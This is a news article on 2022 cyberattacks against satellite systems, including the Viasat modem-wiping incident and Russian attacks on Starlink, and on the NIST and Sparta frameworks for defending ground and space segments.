Early in 2022, the FBI and CISA warned that attacks against satellite ground-based and space-based infrastructure could become a reality — and it soon did. The year saw nation-state operations targeting Viasat and SpaceX's Starlink satellites, and forcing governments and aerospace companies to create defenses against the attacks.

In the early days of Russia's invasion of Ukraine, for example, Russia-aligned hackers targeted the ground-based segment of Viasat's satellite communications network, taking Internet modems offline throughout Europe. Soon after, Russia also targeted the distributed satellite Internet service Starlink, according to government officials and SpaceX CEO Elon Musk, which has been critical for providing the Ukraine war effort with Internet connectivity.

"Starlink has resisted Russian cyberwar jamming & hacking attempts so far, but \[attackers are\] ramping up their efforts," Musk stated on Twitter last May.

In November, Starlink was in the crosshairs again, with Russia-linked Killnet APT targeting it with a DDoS campaign that made the service inaccessible for several hours.

As a corollary, satellites have also become proposed targets of non-cyberattacks as well. In the most recent example, Chinese researchers proposed a 10 megaton nuclear blast 50 miles from the Earth's surface as a way to disable Starlink satellites that pass through the radioactive cloud.

**Computers, Not Lost in Space**

Cyberattackers in this arena are far more likely to be advanced persistent threats (APTs) sponsored by nation-states — often looking to disable satellites and spacecraft. But much of today's ground-based satellite infrastructure uses common computer and communications technologies, which could open the door to other players.

The similarities allow attackers to more easily exploit the systems underpinning satellite systems, while the complex supply chain makes the infrastructure easier to attack, Neil Sherwin-Peddie, head of space security for defense and government contractor BAE Systems Digital Intelligence, stated in a recent column for Dark Reading_._

"Satellites are effectively just platforms with embedded systems and interfaces, including radio communications, telemetry tracking control systems, and ground segment connections," he wrote. "These are all essentially enterprise networks, but that also makes them avenues of opportunity for cybercriminals."

The attack on Viasat consisted of two components and underscores that known attack methods can be tailored to ground-based and space-based satellite systems.

First, the attackers exploited "a misconfiguration in a VPN appliance to gain remote access" to the ground-based network, according to a Viasat advisory. The attackers then discovered and compromised the management network for the satellite network and issued commands to the ground-based modems.

"Specifically, these destructive commands overwrote key data in flash memory on the modems, rendering the modems unable to access the network, but not permanently unusable," the company stated.

These commands performed functions similar to a wiper attack, overwriting critical data to disrupt operations, a common approach in cyber-physical attacks, according to a subsequent analysis performed by independent cybersecurity researcher Ruben Santamarta.

New attack vectors are looming for the future, as well. 

"We will see more automation on the spacecraft, and therefore we will need more on-board autonomous cyber protection," says Brandon Bailey, a senior project leader for the Cyber Assessments and Research Department at The Aerospace Corp. "This means integrating items like segmentation, authentication, encryption, and intrusion detection \[and\] prevention on-board the spacecraft will be a must in the future."

**Frameworks Cover Both Ground & Space**

The NIST Cybersecurity Framework for the Satellite Ground Segment (NIST-IR-8401) builds on a common approach to cyber-defense that includes five major functions: the identification of assets and their cyber-risks, the development of technologies and procedures to protect those assets, the capability to detect attacks, the infrastructure needed to respond to any incident, and the ability to recover from attacks.

"The ground segment is becoming more interconnected and cloud-based ground infrastructures, however legacy space operations and the space vehicles themselves use custom software and hardware that was not generally created to be part of a modern highly interconnected cyber-ecosystem," NIST-IR-8401 states. "This can be especially problematic with legacy components that may have been created prior to the development of security best practices or that use obsolete security measures."

The Sparta framework aims to cover cyberattacks on the space-based components, such as satellites, spacecraft and other systems. The framework will grow and change as the field evolves and the TTPs used by attackers change, says Bailey of The Aerospace Corp.

"Cyber on the spacecraft side is relatively new field; therefore, as vulnerabilities — like PCSpoof — are disclosed, we will add TTPs and countermeasures," he says. "We also intend on working with the Space ISAC, and as it matures ... we will incorporate threat information and TTPs that are identified."

Tag

#intel